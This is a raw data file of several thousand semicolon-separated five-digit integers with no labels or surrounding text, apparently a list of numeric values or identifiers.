15499;46318;36300;37159;35114;54650;30685;37428;49044;37565;21927;65087;32470;43279;15838;63806;23685;30650;17666;39660;42666;40874;24882;53857;54575;57062;47605;51282;31700;61292;15562;15890;56882;39833;21097;66200;36617;17160;62569;44820;38097;26853;26386;18456;36468;55530;11349;25034;50961;28929;24095;44254;15162;28701;49660;33236;47074;25996;65745;47336;43524;34844;43096;10417;60138;64241;27925;41729;26262;13898;51640;47152;60647;44217;65402;54591;41537;17527;64554;10658;62987;12994;39379;21217;66133;66760;52849;34167;36738;13768;23080;30649;27333;58731;37203;26239;21072;40094;63884;50319;56140;23168;16397;34904;45838;65428;24147;19009;58922;16271;60630;45177;46574;37865;15276;52156;28796;23405;42483;50041;41884;26435;36657;28006;23612;31470;56786;15028;40714;23657;64666;30211;33988;60579;21924;24963;13213;66319;46840;34050;30905;39275;30460;57952;39772;17269;22900;40912;59733;15146;57232;49807;25126;30261;10544;57947;10266;12337;65151;15960;49347;20598;52322;21427;62746;47772;61134;57756;56350;38320;58967;66638;35220;23009;66518;22314;26699;35573;29504;57336;43292;56757;44205;61390;39317;32656;32139;52978;50712;66566;61465;38561;55791;28922;31803;12332;58357;65568;41205;37799;31862;59390;55291;30106;17562;55568;41863;24740;38806;20933;33027;29033;12006;34754;56996;24754;25666;64083;47436;34439;28249;65629;54065;26943;65092;33602;44894;57322;59483;13208;50173;24065;11851;52032;19346;29140;26489;22635;44430;53870;40413;41398;40045;28363;64043;23610;52254;43289;16701;13667;24301;15287;29101;29483;22539;42516;30941;32703;47713;53886;56137;39531;16573;22545;26132;45288;62139;46791;37664;36769;54111;14270;20175;51382;65531;28550;36699;35171;17745;39991;11204;54737;11413;37484;60468;51447;28941;22569;43601;15403;26288;51588;14368;63596;31287;62188;52258;11018;42782;16539;55552;34162;22106;41510;13877;25365;41563;31133;23701;61985;33310;39887;17137;34075;34892;44506;33728;66662;62477;12359;50636;35578;50944;24695;52452;64912;57387;48324;21339;36426;53173;11163;24152;11621;42044;27581;21168;43673;54063;27708;42674;24035;43882;55382;49394;57126;30113;25893;31115;16073;21199;34704;60362;46607;18358;41147;12414;22149;35593;11579;20404;38946;28746;15654;53376;34238;37861;17470;48367;61692;11973;21202;31392;33250;55271;28096;47744;40782;65119;13310;12677;14390;47430;24830;60142;34386;38876;64155;42196;43603;26079;35285;24461;41283;46787;24692;30145;15519;45503;50370;62226;43574;16196;47216;30158;29088;30900;18458;18436;53028;31977;66221;22679;30926;12206;54690;51229;51733;64940;25385;19403;51855;59382;46031;53550;20536;48706;44113;40342;29124;26121;63257;26106;20945;41687;27978;55894;54617;52003;12389;46423;24305;50515;53567;23942;45031;27184;11456;66825;17439;33411;47018;26279;27788;24893;62543;40946;16126;66129;30370;59940;55023;48625;65406;11559;54827;36710;42271;44776;53058;35222;53370;28840;53895;52106;23242;30090;59638;47536;11589;25374;46208;32530;21335;45023;43180;43046;59683;24307;22470;48851;28902;52543;51097;23323;63462;33833;14521;39456;25305;19611;31583;45808;54706;33460;22384;31094;33521;59603;35826;48691;24149;27626;24665;22005;11425;56785;18839;42120;25507;44396;42141;55731;44425;28185;13805;44072;12578;10445;41397;42807;28020;59716;10173;37343;53361;56158;44846;20351;53576;47469;40465;47693;25127;18631;48403;10508;15779;20425;42524;20823;58198;27857;52244;51724;41871;62770;64953;52923;58776;60745;54253;30843;35881;23656;66278;45250;21239;49905;19336;21597;10729;53081;57368;30542;50179;42065;43236;43164;51607;27439;41586;47354;20788;61047;37420;56938;28501;30736;43983;12561;65290;57068;23121;17455;46379;10009;51658;25310;32275;64292;62465;39718;22144;43873;39226;59521;24811;18090;51239;55286;52977;48484;41709;66512;53156;56654;31114;46703;48792;13825;19057;40080;30666;21731;12932;47467;43583;15428;16195;18526;19265;64060;54018;57117;19770;61789;53989;56317;30866;53316;18071;59059;51983;48482;16698;59086;51868;16803;17198;13286;36310;29866;58570;57652;62119;44135;15957;49324;35161;17334;65248;62853;18009;36862;52673;39848;29237;22526;32273;14235;60056;26728;54534;19123;46824;15965;44586;52843;57904;45383;49728;60616;35325;29816;63879;39218;40766;57588;60995;22335;38861;15479;51506;57774;26808;42353;51115;66894;24295;10984;57475;61328;53767;58535;40929;31507;20290;19322;35273;45614;34691;63393;15497;44653;20816;44933;13625;11582;47773;35682;36097;40180;32146;55108;26934;55847;45755;63600;20585;32381;31431;23709;46016;41625;29226;57621;62051;44482;19361;46040;32639;32005;17268;33903;12967;64721;15084;47503;35988;57715;16534;13093;29497;23261;10031;46777;14425;64374;18926;20754;41555;28877;16692;39938;21327;24419;18891;51952;40432;42472;11168;56795;16857;61052;30247;10500;55451;46488;21562;56500;56015;17604;59727;49224;52345;61684;64336;50659;57442;54420;40244;63133;49877;22819;40288;10714;65497;52876;53188;41411;53254;50724;39393;18175;62860;58523;28542;49952;56593;26928;41699;33132;61004;65037;52716;64252;26492;25726;50369;62876;64313;59664;35816;62780;46647;55536;57959;35999;38944;24923;14567;31921;33337;15726;44101;47708;51320;28030;32648;52771;42784;32766;66356;28080;54118;51929;64094;29921;22620;41134;11528;51480;34173;65551;42951;17356;31597;18048;12062;26287;24655;57290;64024;16936;39245;34290;64467;63615;27163;14691;27867;32943;26346;41640;64191;14656;39989;32262;30066;10473;44920;29059;13259;56249;23435;28413;23689;64177;21799;66181;58858;65638;56646;43438;32890;22992;19249;43734;26035;51190;65434;50850;37400;45717;44539;26518;57726;42963;63948;50020;45296;19899;50625;52434;18498;38243;58900;62216;32402;15971;30859;38780;21343;54369;58035;26156;25643;61580;45411;45511;53865;32334;65948;40124;25744;44042;13943;63043;64223;53241;54372;12793;27994;29942;52688;41716;48864;63297;62217;55053;30022;47828;41219;16611;26031;16622;47612;28437;57539;37810;31627;18213;32196;58787;61169;13487;44336;37243;51891;23191;45862;65589;51291;58016;35105;15261;57252;17572;41781;56014;36373;38585;26578;24214;63787;41126;65155;30965;48297;40945;29561;14437;41853;10550;12774;52965;53054;47385;53178;11511;12751;47786;50524;12218;22295;64125;30411;58579;37096;29557;37796;14089;22304;34388;66804;33193;15107;51548;57101;62116;47771;22697;62321;63169;15016;31362;39858;41163;45339;12464;28935;45300;31199;42477;35027;33374;30485;14059;53802;50797;54718;28741;50371;65740;39349;26658;13676;31790;14443;46952;25325;59946;66264;52449;62535;55914;26097;52190;24324;64533;12713;39877;52678;23394;49413;45271;31971;59408;54651;32377;63585;15200;51943;50761;41183;30238;65481;24037;65003;10018;56256;32947;64078;37627;60252;58707;53732;26403;28794;41612;56145;29193;50463;23932;34043;52494;31964;66942;50831;18965;32211;48179;22633;29800;12316;23235;31869;15104;13144;17258;66864;43493;59629;46503;35524;23130;32671;20179;44509;53072;28230;38525;32371;42815;37375;17303;60785;28742;66424;48457;15547;19476;41452;64178;12352;39051;33597;62908;58085;32098;46368;52045;15145;38371;17674;16737;29347;14106;27303;36964;50784;57612;21915;21349;48489;44438;43833;17627;49346;28396;59854;21777;55294;47125;33477;57348;37915;46056;37459;23616;65056;17530;63072;23223;51305;24264;56204;20377;15935;56068;30245;17479;51245;47798;40708;16336;15295;41646;62221;40258;61325;26818;55509;57084;42905;33615;41073;52690;61000;47752;33160;63062;64279;65246;59354;56822;40913;52471;21829;13112;35659;53586;10609;44056;40115;56284;52854;21869;36778;63195;18168;26906;27850;26046;26669;16799;24901;52473;55625;30728;10004;63303;31802;45472;54610;66693;34777;14339;10835;46570;31482;51961;23312;42875;46806;54465;63499;26560;48252;63265;34384;53011;49770;52260;25983;29671;64573;33045;58636;12424;27229;64960;11917;16724;19607;23473;60057;47670;40491;38192;52018;52619;54995;46884;24066;34766;65486;56838;15835;58068;21389;32034;66968;49929;25261;16516;21734;45274;55995;44004;45135;58252;49232;41232;27513;46172;40818;24346;25336;43126;34314;41174;64186;56297;35882;49914;34620;30570;59799;41856;23256;33249;66151;49144;48881;62238;19619;31635;26900;57447;33378;55427;11049;25518;18007;38039;48172;51409;37578;48668;51627;59000;28092;16102;50778;47363;46335;52019;61638;27551;28663;48978;48462;13821;54831;12980;58693;64614;44267;52189;27923;57635;61281;58653;55158;20070;53507;14064;26393;42096;41669;59839;28959;65291;27927;26027;19838;17495;20050;39934;21496;43770;33172;53608;53968;24758;14834;47714;35414;49075;30724;59593;28043;62640;46303;26358;12837;41813;19196;56299;25789;45970;56363;21411;60021;14325;63918;17548;25449;19269;39902;11825;23775;55761;26644;47723;57805;10908;14816;43674;35938;28383;43446;43284;17274;21290;40147;26617;29168;63606;36608;62115;20048;51173;53115;44110;32818;66094;33982;51113;53395;24961;20641;47840;16047;30454;65837;29622;41214;14978;35613;55389;22447;52010;35098;14297;39439;10226;35415;24736;11323;56281;50439;61424;29156;10804;15535;29057;33130;65127;28347;57564;17775;51027;11815;52499;37088;54152;17531;62110;27755;20713;27386;15941;59714;64413;49756;42841;42468;21877;15443;51788;14727;14385;28503;48827;41798;48967;60607;23287;60341;59394;11121;19837;45944;10291;10470;46916;29084;33642;31536;66625;46649;55650;29413;60598;39493;43328;41274;33081;49285;17229;17144;10084;39310;49255;64563;32258;14219;52361;65209;53032;31153;60009;30379;48259;21062;27088;50966;20761;48867;40541;14282;25697;20722;33490;33878;22377;15368;23156;31823;27485;27044;36822;55081;22710;18396;45396;30874;40598;22771;44676;64624;60450;38670;34085;28398;64532;19233;57327;23782;47718;54662;14534;45420;13240;17238;39144;12210;23842;14752;27416;58868;63536;37338;65559;56813;54210;12543;16536;45035;11661;15097;12345;37787;51844;57901;34031;36951;14552;22484;60268;45248;42509;49609;11479;62573;16292;34943;49773;39486;19408;11502;22946;45642;28860;41671;54338;61166;64093;40709;49445;22689;57762;51181;28526;49506;21397;53697;30664;58767;65366;42257;52357;57263;33056;58000;27899;21377;20529;21609;59653;35928;17522;57389;37803;39322;14842;63914;43212;28844;23281;43383;21223;29897;25864;44777;44140;16844;55944;60153;15474;28032;49848;29322;27960;13165;20062;21375;39143;29258;35582;54096;16661;52280;55557;45723;11903;49799;18017;11916;43152;15189;28558;60819;60613;59779;54880;46968;23687;20269;11275;23184;63180;11200;10352;36633;23954;60069;17459;42593;54660;52778;33502;13652;45946;24924;56657;49549;10397;41972;42278;45709;30236;66513;61796;10848;18829;59585;65094;28966;32862;21819;27742;45934;61768;45014;27817;44548;12540;60947;59681;25210;14528;45200;55068;64491;51614;22888;48542;65525;38124;12305;57285;32307;55277;52414;46819;54749;44528;49014;65574;47902;56371;28356;33679;24715;58941;18726;30654;16419;11535;41415;30276;58581;25588;14371;25574;20071;46338;37819;39295;42579;43377;63951;29566;64767;30494;47208;46562;11493;54748;22847;60342;61085;31054;47374;23767;39826;64738;30727;32715;57977;57865;33001;40420;33447;40696;36245;45839;14453;46686;59266;26157;55404;21388;40518;56506;35821;17050;53771;61626;52122;41455;40017;20908;29843;19868;22132;50304;48607;64900;54512;63886;11723;43720;56662;52608;16898;43965;52094;19328;40739;19871;50070;17041;11081;53396;18715;23578;50340;35163;42678;42941;14254;58584;45705;54696;62247;65707;39294;16527;12520;43435;21889;24787;20614;59482;60353;39025;55782;33990;47023;51813;25746;48981;61810;50605;28425;45539;34955;36988;49016;13355;11892;59275;63512;22564;14111;23031;27114;49359;25851;23243;39657;65253;65470;59429;27316;36521;35699;38845;17519;27570;18077;59679;21114;24935;39036;10150;24431;23343;57560;15400;20055;54138;51110;60857;11133;47466;46730;47735;52288;54741;24680;63940;57844;34504;60700;60908;32354;17824;40888;34222;12562;17325;13462;66000;64664;48584;64091;49452;22060;38784;42030;65506;37712;25485;39525;38152;39183;50821;13435;27516;13391;13500;11148;49288;29575;35864;65510;46802;10108;10997;22565;20630;15587;58031;53290;53706;32079;59778;19426;13666;49721;28801;23511;21160;46529;20518;35860;54694;38737;43218;25268;16324;10852;34205;61083;13634;34324;15787;54799;41448;57864;28919;17502;27260;51582;12090;31255;27443;15098;28577;42379;58779;26210;59661;24055;25514;47163;43528;24047;33697;35331;26571;24555;61327;34219;66721;44234;33124;23944;41424;14225;33888;10688;21455;42441;10667;57689;65023;58208;13739;19720;35612;28612;64526;46693;29119;39628;63143;36099;27800;66465;21196;28045;27125;33685;31962;52623;45635;65391;63663;31830;39135;11438;55351;61049;61208;57293;13715;48609;47296;66125;50689;43311;19488;40390;42744;63387;14598;15979;44007;17489;65519;28182;65178;54225;28802;47775;16455;53410;13274;54193;37193;56572;29539;22054;40245;63289;35982;59571;19918;52639;15195;48592;28327;53775;14221;45299;33095;54038;28682;44538;30181;13404;49900;10100;22551;40171;20163;38233;48352;58370;51634;49965;65123;63096;66777;46568;51191;26694;51962;50367;15502;42698;35197;33716;23587;32515;13116;29392;30713;35575;60703;11718;53047;19767;28103;23289;40000;14066;61892;54101;29786;36022;58078;49111;22945;10954;57347;36218;18231;38389;47122;38589;66731;42597;19893;64989;44597;35985;38140;16364;66546;41172;33345;28116;24989;54399;62220;16668;48164;62208;23844;57843;35459;57574;50590;31456;53454;20814;27744;53822;38231;55591;61623;64243;40512;53686;46891;18469;25405;17702;21357;18170;58080;47154;26559;18334;64663;55820;10122;66778;20997;26047;32640;26278;19961;21330;45509;10521;64450;33357;52131;29846;15839;18066;34174;21283;56422;19601;58026;56091;48944;42848;48595;47100;23161;35639;42600;30515;11302;31848;56891;59956;23848;46934;12662;56946;22995;59147;54467;53795;39560;19118;59953;58468;33973;63115;63292;53908;35719;50960;45191;29203;29953;66905;28771;44218;27834;51581;34486;15917;27554;24568;58850;51728;24194;18045;33937;14571;66383;23974;19041;50826;30768;20727;29832;48822;23388;60731;18621;44904;21288;44031;46483;46420;48957;20836;16598;60543;16237;44851;26806;24712;59452;47886;23465;62624;12085;17985;37038;56724;14689;62372;36972;44321;19337;38336;48942;37848;53529;49325;40063;61529;22611;27725;47738;33409;45428;24360;39246;35245;11998;48928;51076;18605;36615;10854;18308;57463;18628;25745;36401;42183;53812;50054;59229;13249;15891;31259;30531;24271;31950;40428;65891;20556;65842;61680;19903;10185;32545;33864;53671;50981;15929;57799;29040;54567;51902;33779;61183;38295;13585;23452;46925;49221;29849;50043;28474;11353;38128;18082;22802;20678;42613;38792;47873;63008;45775;56442;64114;52695;46258;15871;43025;28751;21150;65033;51347;56551;54916;15202;38401;61537;26136;53369;56990;56682;11247;18789;30322;55050;26437;56549;65293;50231;64211;10784;39841;20690;55978;56789;27157;31332;45926;58750;52900;15951;53149;61767;33554;25358;26691;39552;45579;48560;12708;62966;18650;46750;39939;53439;55757;31000;27471;49132;55183;16895;47316;33945;27259;36283;29509;38932;20657;57948;25155;21197;11455;26302;23444;11314;37717;28945;50626;35192;10549;49043;47881;43820;24447;31929;60748;19895;27524;13183;34376;56197;62887;40291;22166;26168;47097;62863;41718;28348;11112;25085;36875;57877;12823;62997;21198;27021;59573;56388;63152;32537;22664;29833;49011;41059;30332;38033;31784;28668;31111;64291;55042;50270;28087;25988;39574;22450;63666;30969;11288;55866;58250;12413;16957;38227;14991;50613;27014;51234;48270;22421;13046;51118;21122;34171;33805;43048;17573;62906;24053;22191;52948;15594;41050;48447;31252;25271;55490;33717;50032;57912;18655;31093;38567;46903;25168;20977;61921;31852;19438;25300;46919;43637;54532;46738;45046;62613;62637;23125;30386;36919;21654;43975;51390;29334;49712;46044;49997;57129;42589;21060;55082;24825;21090;17508;45269;37502;31729;17094;42370;38672;16367;49681;55594;10920;14533;21666;15650;39289;31860;26849;51182;54025;38770;42020;11630;47671;58258;19880;52079;15712;29137;54770;65719;32757;52851;29940;61193;36856;58794;18957;60567;24436;21066;18450;32271;39700;50221;40570;21989;21073;46282;19710;35284;43418;46533;50348;31634;49120;36820;23911;42157;18887;19091;55321;22970;39017;41067;31910;32689;10275;34936;64071;25832;51750;44290;21250;57684;25142;57225;46067;36054;65617;52367;17059;14474;35101;39586;47159;58497;61803;42052;35543;66665;37103;14179;54648;19723;45182;15144;14248;16776;44979;22468;34815;41603;31329;47546;26265;22546;21888;58632;40421;48331;45536;21292;27472;21315;48514;38642;50428;50840;12019;27392;55908;58263;39462;15845;51782;43082;52456;65423;66134;56109;61471;16746;31004;49102;10406;58478;19793;27378;25965;43478;32122;46592;35485;65800;47620;19376;11485;21807;50946;30917;11653;49018;64045;27902;26218;44494;24030;14871;24373;25105;35029;33173;48193;60177;35763;31898;35530;53704;38482;13728;26857;62248;14190;66162;57464;46446;45103;54376;30123;56096;22017;34375;12948;24560;61230;39375;59422;21466;45119;45787;19473;30610;31479;43702;11359;59777;53734;33659;41906;12852;65242;26693;41712;13952;63733;61172;30810;19565;33672;37948;66954;61121;25861;42072;29781;60212;53209;41664;58135;10007;15384;62740;30231;20274;42334;25575;41868;58148;37441;20186;48412;55958;12783;21295;57591;12542;22184;47552;31577;42959;24706;61749;20521;31576;21993;30091;45696;41231;37713;33610;32673;18666;30947;14447;57497;28604;21717;46055;54581;33261;18430;63259;35832;28517;15572;29072;38548;41076;27728;32915;45982;24349;14954;22652;29727;25389;60609;10138;60400;35640;18866;49495;12851;42527;35134;55969;24201;54958;49993;59037;23392;56975;46684;33262;24530;38499;28628;60537;54052;39476;61299;22226;55047;21076;57782;47149;51919;66856;30637;22943;38955;31193;54184;54678;10101;36842;14166;25026;13360;57941;52398;26014;29693;44258;25804;63729;66216;15867;51958;39664;51222;55549;34391;53860;57244;27235;61268;29991;59958;43151;24497;29477;23836;14949;32008;36900;18120;50239;59073;16002;28867;53900;28729;58978;43732;23693;46243;12004;59015;66358;10801;30349;39774;57095;54843;15100;28134;61994;31566;33383;57478;22824;33476;11810;14712;46704;35435;33664;49536;58362;16061;51729;61291;25572;54201;41198;64150;60205;63294;13969;49438;50107;38679;30786;15380;60892;46796;49754;50460;10633;16147;50188;50815;43288;54584;62232;34813;48261;61854;57465;64267;31937;64010;61610;15439;46950;23142;51839;62156;50415;14929;25828;48886;30165;21316;26565;63406;38027;13235;56098;42351;60315;61159;56664;30317;60590;38639;31454;20047;23196;30249;27050;35529;31443;65274;29579;63651;21706;34874;30148;40685;61585;52507;43932;33718;13340;42147;32577;27618;41850;53825;59318;27738;43552;54871;46180;34118;54320;29224;52315;61317;64635;36694;37418;37604;29605;19512;41111;60727;58199;20772;28415;34551;36383;56709;17503;48618;34627;34445;28245;66719;55672;46557;17185;51432;62699;29415;50261;36020;21749;10008;44393;11659;35873;43670;35338;21219;14301;56675;24656;10559;22286;32635;64273;42771;48302;36287;41181;60010;25260;43671;61754;39216;10050;12119;62086;23035;59362;44603;38888;24238;27649;47064;13386;12881;19098;35815;15120;17131;23650;61439;18284;11576;50924;44724;21534;23565;65259;22642;59182;57706;39089;30777;33799;45471;43354;40915;45761;63050;27024;66606;63042;20201;47789;19395;63905;43780;12964;45390;41410;27442;22176;27357;58957;59109;21282;19119;50498;44858;50928;11814;34833;19894;48775;42764;18101;24798;17594;43664;17512;46138;14065;43300;64732;31915;20385;57759;14415;17163;25065;17076;61005;44274;55328;33308;31251;37773;25568;20152;42401;57661;20216;20622;49242;55211;50822;16404;25807;30176;53832;61026;20949;33192;16230;19812;39710;30335;43958;47570;14367;57331;53850;55391;41414;47278;56024;15179;49477;28662;55679;59244;66914;31166;19026;17721;14239;21942;51087;62683;60701;41116;16681;46612;38326;14143;65373;21809;29691;13301;40299;31186;27241;18503;62283;29287;19549;40530;50760;25226;26829;64115;28404;22641;19499;15050;16009;64148;46145;55634;58316;22292;38208;58687;36551;18634;24188;55589;45953;46930;29882;49328;37372;24940;30648;62358;25649;42172;40076;61629;31342;48521;55104;61109;21266;40374;51814;13803;26932;55608;48972;66862;59920;58273;20674;12632;43006;37335;38515;37626;41920;28378;66152;46606;16866;24673;50140;14716;53490;53766;57522;39913;13015;44620;35915;39468;38191;21742;52163;27776;60899;33123;12462;40827;41473;24406;34416;62729;54852;39936;35349;19707;11921;39831;27502;50468;63035;15322;17452;51633;54447;46468;40576;10036;12050;26720;11650;29559;24265;16306;28715;34852;61830;27162;14040;21657;62854;13153;54261;47062;22266;10294;26456;34140;44252;61574;58661;51989;22283;36185;52802;45726;46225;66345;18916;51869;42776;18457;17188;41647;53246;47085;31302;44943;40993;34880;36872;44680;13546;34385;50273;66869;47890;33955;41695;23696;44569;41913;15019;39596;22168;43191;32035;46497;23965;18272;42924;16453;51759;31320;30659;65604;28027;28705;34969;47325;50749;36295;63019;35617;49277;13182;26471;51119;43030;24337;51653;20272;12867;26762;42867;46022;12599;12321;41623;34548;28382;26185;58541;25306;49541;31224;40343;55033;23209;55345;65751;50237;52884;46086;33866;25007;15811;46255;45969;28900;22768;52924;24732;54869;12727;40867;13308;25629;16502;40924;10607;23215;16452;12203;39976;10768;43386;49625;53301;58624;23635;19254;48417;30924;55932;17201;45752;53780;53694;14128;49563;60351;53702;60890;48727;60031;43966;65903;56327;56008;20020;26497;15054;30193;19843;37996;17621;39540;21835;47563;15553;21611;34175;52030;31097;15154;66068;38640;15704;57871;63760;42430;40533;34185;60255;38928;27364;51642;55951;13638;49796;55373;26073;31645;41418;13430;13285;44940;55171;62396;30162;32973;63048;21582;22216;30586;21718;20040;63521;48222;62824;65660;42305;33856;37894;36627;38396;23631;38764;50901;18474;42818;62462;12416;17332;10548;42723;20085;32490;37946;50677;56820;11446;54828;42983;46224;38667;10567;24090;21845;53203;18527;57308;56533;58220;18047;49411;40955;42831;39730;57754;55214;61785;31007;22219;12261;11849;28755;58853;63389;21333;56026;49142;16629;21793;12067;60895;27165;47131;39553;42400;16463;10661;25202;59356;17451;13251;54521;50976;31613;31161;20851;48469;64751;25121;59607;11317;35158;63505;19826;51741;50545;62673;36465;23331;13714;41657;43931;56421;65044;17774;30598;45703;27142;19915;22492;39224;20928;12557;12254;27905;35020;63339;22986;26504;54336;38599;22530;46634;38339;55821;55118;65232;23735;44471;28670;43821;41977;23070;42817;25766;63372;10976;22507;18357;44358;17669;35756;24069;14695;35830;12075;57765;52387;61082;12487;45548;44166;43910;32723;62143;14136;62033;51783;55030;52287;16305;37950;59893;27081;24203;37036;36428;52897;12749;28438;35548;54918;52469;33622;58498;32504;59536;20833;42284;52586;48796;12814;13841;14861;28590;10494;58429;16767;40151;47206;62844;46360;41109;15365;49362;11318;22758;39666;32054;40506;20267;20932;62837;25840;55691;19911;14480;45057;43042;52987;54086;62275;56616;33273;49704;41082;48515;58149;28547;33872;36697;20296;66482;11068;22884;17608;52517;37115;21187;13305;39083;55186;18261;16354;51342;19005;59599;35115;50172;12323;46848;37800;44063;20015;16595;19459;48884;43913;56221;35394;14129;40360;44689;31325;65906;46560;32454;37361;19616;59119;55337;34499;46150;33446;40514;37625;22703;61293;28220;17224;62227;24427;50799;25349;32007;11422;37984;15493;30207;38049;43898;20615;48695;47883;56409;38507;14614;54182;12974;28537;30338;33036;48314;66013;43991;11902;15933;27084;49473;61509;58798;46280;46569;34070;53440;33352;50513;46683;20401;55931;39524;50891;65017;65771;29358;44977;47860;33141;23937;34257;11369;61688;25940;12739;57390;45704;62645;62085;54621;39814;32625;23353;52559;19283;35235;49408;61671;49209;51022;66692;19456;28077;16524;31711;33991;49208;66443;44118;36301;48148;53757;50305;18246;62237;25454;54366;36485;24021;58867;13755;45877;21294;23145;28047;53123;53212;62525;39537;24159;55013;58034;51302;21083;38503;28328;63140;54878;25702;18093;42492;44928;36037;51812;52788;25942;28614;55218;43231;11999;40270;23273;43844;49004;55491;65332;64684;59931;16507;25324;33473;56067;20471;49967;24052;27187;65177;66959;30398;59219;32679;32433;37663;24430;40044;48677;38120;29929;39706;45237;45429;39621;63473;54257;39640;19198;33492;64977;57335;39925;54999;19317;37806;50076;60182;65848;66661;58765;38131;46247;34916;59459;11232;39291;49565;66589;20206;16370;59841;47308;21798;66042;54485;29186;55578;41550;43416;51671;19293;20492;13482;26701;46629;38222;30665;33593;61687;18343;55455;26264;24229;56749;66452;15302;64285;14206;64705;15141;44706;25315;56070;52536;32599;51569;16973;13082;11561;24785;18837;51897;32615;29383;47496;35252;40772;40386;15390;36589;14986;20573;18096;50048;48685;11836;51909;22582;42136;52198;32385;45042;49533;32010;35023;53443;22046;35487;42190;15513;34677;31307;60276;33740;58743;66373;60972;58784;37146;50681;36059;29654;32702;34276;18068;17792;61833;47347;59140;54377;38655;51842;56326;18934;49947;18577;40700;50299;66043;35934;19219;39201;42075;26050;16567;38779;50985;11531;55266;30953;24109;16715;39374;57668;52218;60641;66407;53753;28918;47434;38308;55946;34978;62531;50505;65614;43427;29551;12450;29062;38435;54325;16849;36434;66877;42797;41233;66170;27706;43948;47076;53135;43286;11141;24832;58714;36323;64997;51423;36969;22988;47868;57786;36733;49226;49643;22362;39865;51816;44150;31880;30655;11149;38466;26816;56012;34717;34757;48338;56805;38573;10990;52635;22159;59625;64931;51809;19845;49317;10270;33496;38732;55113;16604;64479;54233;51140;10115;44945;47004;19381;46742;46441;66687;59751;57634;48458;31649;62870;21504;27587;43154;66394;63084;57220;33923;10340;56780;52838;27750;63833;22968;51884;11015;45311;65218;45502;35348;46039;17422;21262;48456;54502;17320;55198;20954;56269;20024;12531;26750;35754;43978;38757;41286;60551;15309;13831;63137;60377;58064;43054;66696;39274;64271;35539;44206;24772;18905;32131;36593;57449;61170;50601;63144;46264;32006;25717;22193;22882;49238;21931;25636;16703;37684;15033;59379;57770;39695;10995;54454;29581;42956;43209;48431;22972;17636;54961;45725;52549;25298;34498;65343;55609;21307;52464;51826;64346;31250;50160;32491;33289;22167;47812;50245;19701;14186;25072;50170;29787;17384;53129;55470;20294;17250;23424;62263;53679;37005;23033;13983;37658;64662;34473;56685;58815;37847;33800;23160;63988;21179;31360;13606;51156;57841;11004;49940;33733;26689;36098;31562;25133;62048;34719;54522;47622;16228;39021;60012;12893;52862;65927;63476;21606;61123;51204;44751;47885;39186;11231;42238;36950;31072;26447;38657;21817;32441;33671;50072;33686;20896;22284;30657;53003;51064;16154;64691;45716;42356;23448;43463;14600;57987;24528;29927;50969;32150;50752;31351;12003;18494;26831;55555;59381;36055;10541;12000;28193;26830;53654;11123;27129;61530;56930;45252;42734;53800;51901;12387;36090;44551;42914;30150;35655;21459;30602;60690;42364;27930;28275;61898;49391;13287;42097;58962;10862;30742;21999;39032;54688;26224;18597;42646;22940;22885;42237;10425;24991;66432;56971;49392;28312;18419;35648;27275;53333;61881;39420;59803;31070;34984;38493;64651;37783;25673;62054;40226;47529;42614;22449;42675;15859;23412;44134;45552;45560;33353;23192;18950;47255;44180;28857;37695;39174;13263;35417;10736;65882;59960;16256;31978;21549;25899;25433;34232;39565;62043;11319;37893;52816;54788;55721;32778;21259;20582;12535;15589;26100;12002;57471;64159;14866;64645;55485;35413;57740;56167;46153;34083;57933;12102;40691;24474;14181;13130;59670;36199;60979;38591;35264;16687;43237;10292;14424;56460;10427;44714;25620;32048;40367;10043;46849;49175;35110;22866;10664;58682;11519;14550;20166;47056;53853;50274;46120;39962;21320;26054;41125;17606;15423;34494;54095;38802;54103;33469;18925;64770;26117;39463;55233;25104;10288;11146;34744;60478;38664;31156;33757;37182;37692;64384;65455;16035;62512;15722;39788;62888;57677;50099;55287;41450;12452;44997;13693;14631;52641;41509;19825;50052;19530;43264;12390;56837;64006;55699;53796;61910;64655;33218;27913;56890;44373;46102;13011;45484;37573;15157;61622;23761;54519;35879;49986;14121;30430;47304;46447;29990;11320;28292;51243;47602;11352;30385;51725;27117;66491;11365;10319;28717;57708;28125;23859;33959;29746;64620;21591;43776;18433;29082;61534;16676;50596;29375;34317;16055;56274;17090;15212;24554;29562;17722;46521;14644;44281;33332;61191;30870;55385;48755;38028;33279;50830;56871;59002;57819;58927;57638;26338;54844;55478;25156;62783;63148;16246;21065;11830;53663;39202;24609;33933;38200;14230;66801;61923;39069;21491;11274;48309;57934;50010;25986;25712;64355;65302;61628;18521;51129;18377;64351;50814;31013;35431;18953;49869;31279;50527;42497;14853;17758;32830;10962;43280;62474;42949;34697;66362;60016;54587;18562;45894;23060;15755;65647;38145;44566;48878;21897;62128;19992;47358;52021;40371;15153;62622;26392;63870;36026;43537;20768;59987;63697;28735;56403;21373;26542;21767;21596;27892;13296;24631;50232;29075;27252;13619;32521;13505;57914;48364;19766;66440;31084;61304;63159;12955;30500;30744;34286;15529;56986;35006;40898;45831;53885;57892;29531;11400;56575;14939;14383;42691;61926;54029;40048;34150;38069;27352;60051;50386;52468;57371;11467;54207;34570;47843;59170;25622;14925;58090;51247;10940;26242;33836;36429;59601;26255;62186;35018;20348;22869;57566;46238;61326;26894;11677;34423;30356;59656;25685;27585;53846;32780;27209;21005;55826;20726;31783;17396;43144;29609;26321;55293;16420;38335;22820;55727;19234;10254;52718;52765;49104;18444;55467;38268;31502;37993;35549;20133;22684;61832;59254;22187;55751;23085;32383;23419;57724;33583;33925;54702;33582;50021;51309;16007;28269;17151;60800;30533;19343;48326;10399;13906;60918;24753;65681;19073;47373;46735;49790;20658;43094;32750;58217;42806;11558;10413;44357;18386;14370;35420;42048;60408;57720;35239;32939;18392;30994;31488;25157;33038;31854;38290;55176;34260;10819;64680;46905;17305;36781;16538;43403;54809;59128;37943;42576;11376;59963;65540;38196;35494;20795;13075;22307;62120;31083;60283;12734;14495;21564;21901;15804;51278;25679;53816;32980;23221;66111;45214;13265;28095;21394;58427;19354;43375;48253;31480;14969;16026;35039;28674;34208;14386;63931;44976;64843;34104;32494;28276;61038;44925;56721;45899;51482;59620;42491;54744;23278;53426;49247;34832;62627;14635;62181;18890;47592;18295;66668;37563;29937;20383;18303;63124;22113;25667;17816;31540;41980;56111;36869;15501;24463;26828;24492;19239;38137;63551;28549;43059;29898;39781;48558;21347;37976;28869;61144;42151;22398;50885;55977;24233;32965;46880;38791;26206;61929;27910;21385;63730;36342;59107;12259;41490;11458;34299;37986;29523;23109;48765;31519;47355;56935;43266;61664;16678;59856;59227;56691;28776;60716;35948;32962;64077;48826;47165;36031;36072;23526;50383;14894;54265;60768;41796;61591;45041;45634;33454;57450;24703;61933;